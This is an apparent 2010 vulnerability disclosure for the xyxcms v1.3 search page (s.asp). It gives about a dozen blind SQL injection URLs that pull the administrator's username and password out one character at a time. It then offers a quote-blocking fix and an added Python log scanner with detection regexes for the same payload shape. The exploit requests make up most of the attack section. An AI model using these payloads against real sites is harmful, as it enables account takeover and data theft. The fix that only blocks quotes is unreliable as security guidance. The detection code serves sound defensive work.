Published: 2010-06-19
Author: mars
Affected version: xyxcms v1.3
Vendor site: www.xyxcms.com
Vulnerability description: the search page does not filter its input strictly, which leads to a string-based (search-type) SQL injection.
Code analysis: s.asp. The string-search injection can be seen from this code:
k = request.QueryString("k")          ' search term, taken from the query string without any filtering
page = request.QueryString("page")
if page = "" or isnumeric(page) = 0 then
    g_cur_page = 1
else
    g_cur_page = cint(page)
end if
Vulnerability test / exploitation method:
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT CoUNt(*) FrOM admin)>=0 AnD '%25'=' -- guesses that the admin table exists
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT CoUNt(*) FrOM admin)=1 AnD '%25'=' -- determines there is just 1 administrator
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT CoUNt(*) FrOM admin Where len(username)=4)=1 AnD '%25'=' -- the administrator account is 4 characters long
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT CoUNt(*) FrOM admin Where len(password)=8)=1 AnD '%25'=' -- the administrator password is 8 characters long
The username length is 4:
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(username,1,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=109 AnD '%25'=' -- first character of the username is m
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(username,2,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=97 AnD '%25'=' -- second character of the username is a
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(username,3,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=114 AnD '%25'=' -- third character of the username is r
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(username,4,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=115 AnD '%25'=' -- fourth character of the username is s
So the username is mars.
The password length is 8:
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,1,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=49 AnD '%25'=' -- first character of the password is 1
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,2,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=50 AnD '%25'=' -- second character of the password is 2
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,3,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=51 AnD '%25'=' -- third character of the password is 3
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,4,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=52 AnD '%25'=' -- fourth character of the password is 4
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,5,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=113 AnD '%25'=' -- fifth character of the password is q
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,6,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=119 AnD '%25'=' -- sixth character of the password is w
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,7,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=113 AnD '%25'=' -- seventh character of the password is q
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,8,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=119 AnD '%25'=' -- eighth character of the password is w
So the password is 1234qwqw.
Fix: filtering out the ' character is enough.
k = request.QueryString("k")
' Reject the request outright if the search term contains a single quote
if instr(k, "'") > 0 then
    response.Write "<script>alert('error');window.close();</script>"
    response.End()
end if
page = request.QueryString("page")
if page = "" or isnumeric(page) = 0 then
    g_cur_page = 1
else
    g_cur_page = cint(page)
end if
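Added example, not code from the post or from xyxcms: a Python log scan that flags the search-string injection shape described above in web-server logs, decoding the query first and matching case-insensitively, since the requests above rely on mixed-case keywords and URL encoding to slip past naive filters. The IIS-style log lines, client addresses and field layout are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C-style log lines; fields: date time s-ip method uri-stem uri-query c-ip status
SAMPLE_LOG = """\
2010-06-19 10:00:01 10.0.0.5 GET /s.asp k=news 203.0.113.7 200
2010-06-19 10:00:05 10.0.0.5 GET /s.asp k=1%25'+AnD+(SeLEcT+CoUNt(*)+FrOM+admin)>=0+AnD+'%25'=' 203.0.113.9 200
2010-06-19 10:00:09 10.0.0.5 GET /s.asp k=o'neil 203.0.113.7 200
"""

# Signals for the search-string injection shape in the post: a quote that breaks
# out of LIKE '%...%', a boolean operator followed by a subquery, and a tail that
# re-balances the quotes. Matching is case-insensitive on the *decoded* value,
# because the payloads use mixed case (AnD, SeLEcT) and %25 for the % wildcard.
RULES = [
    ("quote_then_boolean", re.compile(r"'\s*(and|or)\b", re.I)),
    ("subquery", re.compile(r"\(\s*select\b.*?\bfrom\b", re.I | re.S)),
    ("like_rebalance", re.compile(r"'%'\s*=\s*'")),
]

def decode_param(query, name):
    """Return the decoded value of `name` from a raw cs-uri-query field, or None."""
    if query == "-":
        return None
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return unquote_plus(value)   # '+' -> space, %25 -> %, %27 -> '
    return None

def classify(k):
    """Return the names of the rules that match a decoded search term."""
    return [name for name, rx in RULES if rx.search(k)]

def scan_log(text, stem="/s.asp", param="k"):
    """Return (client_ip, decoded_k, hits) for requests to `stem` matching >= 2 rules."""
    found = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 8 or fields[4] != stem:
            continue
        k = decode_param(fields[5], param)
        if k is None:
            continue
        hits = classify(k)
        # Two independent signals are required, so a lone apostrophe in a legitimate term (o'neil) is not reported
        if len(hits) >= 2:
            found.append((fields[6], k, hits))
    return found
```

Running scan_log(SAMPLE_LOG) reports only the second line, with all three rules matched.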